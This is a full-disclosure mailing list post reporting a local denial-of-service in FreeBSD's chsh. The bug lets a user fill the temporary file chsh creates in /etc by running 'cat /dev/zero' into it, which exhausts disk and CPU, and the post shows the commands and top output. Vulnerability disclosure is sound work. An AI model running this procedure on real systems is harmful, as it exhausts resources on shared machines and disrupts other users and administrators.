FBSD chsh DoS

[full-disclosure () lists netsys com (Charles Stevenson)]

--4jXrM3lyYWu4nBt5
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

I found an interesting couple of related DoS to do against chsh on
FBSD. Basically chsh creates a temporary file in /etc and then
launches a user defined EDITOR. Anyways I couldn't find a way to
exploit it but I did find a way to be annoying.

tty1$ chsh

even if you just launch vi you can get the name of the temporary file
it created in /etc or just do ls.

> ls -l /etc/pw.a1MwaM=20
-rw-------  1 core  core  330088448 Aug 15 01:44 /etc/pw.a1MwaM

Er that's after I was being annoying hehehe... filled 60G on phased
machine. Sorry phased! :D

tty2$ cat /dev/zero > /etc/pw.a1MwaM

Then go back to your vi session in chsh and :wq!... The results are
that basically root can't even remove the file while it's being
written to and of course lots of cpu overload abounds. Anyways quotas
will stop this but how many admins put user quotas on filesystems that
users aren't supposed to be writing to?

  PID USERNAME PRI NICE  SIZE    RES STATE    TIME   WCPU    CPU COMMAND
14139 core      55   0  1140K   612K RUN     12:55 90.23% 90.23% chsh
14171 core      30   0  1912K   976K RUN      0:01  7.81%  2.83% top
13083 root       2   0   356K     0K nfsd     3:00  0.00%  0.00% nfsd

peace,
core

--=20
  Charles Stevenson (core) <core () bokeoa com>
  Lab Assistant, College of Eastern Utah San Juan Campus=20
  http://www.bokeoa.com/~core/core.asc


--4jXrM3lyYWu4nBt5
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE9W/pVGAuLrxOyeJMRAgEOAKD0s/uzV5BaBcItdgxo1d/7Oe1gnwCfZEay
xKWbW17tdXKxdifKOjyG0GE=
=yBlp
-----END PGP SIGNATURE-----

--4jXrM3lyYWu4nBt5--